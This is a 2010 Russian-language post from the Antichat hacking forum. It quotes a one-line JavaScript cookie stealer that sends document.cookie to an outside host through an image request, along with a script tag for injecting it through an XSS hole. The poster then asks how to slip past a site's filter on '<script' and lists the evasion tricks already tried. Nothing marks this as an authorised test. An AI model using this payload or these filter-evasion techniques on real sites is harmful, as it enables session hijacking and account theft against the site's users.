
10.01.2010, 06:24
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Сообщение от .:[melkiy]:.
создай на своём хосте 1.js в него впиши
PHP код:
img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie;
ну и где ты там нашел xss впиши :
PHP код:
<script src=http://site.ru/1.js></script>
Скрипт не позволяет использовать значения <script в любом регистре, причём он его не проглатывает, а именно не пропускает эту информацию выдавая ошибку. (поэтому не надо предлогать варианты типа <scri<script>pt>)
Я пробовал <scr<!-- -->ipt>, так он пропускает, но код становится не рабочим (хотя в манах по XSS такой способ рекомендовали), может быть я не так HTML коментарий использую?
Поправка:
Останавливает передачу, если замечено значение <script (вместе с одной ковычкой), без ковычек пропускает спокойно, такое значение script> или </script> тоже спокойно пропускает. На регистр так-же не обращяет внимание.
Очень надеюсь на помощь, и разумный ответ.
Последний раз редактировалось Nightmarе; 10.01.2010 в 11:38..
|
|
|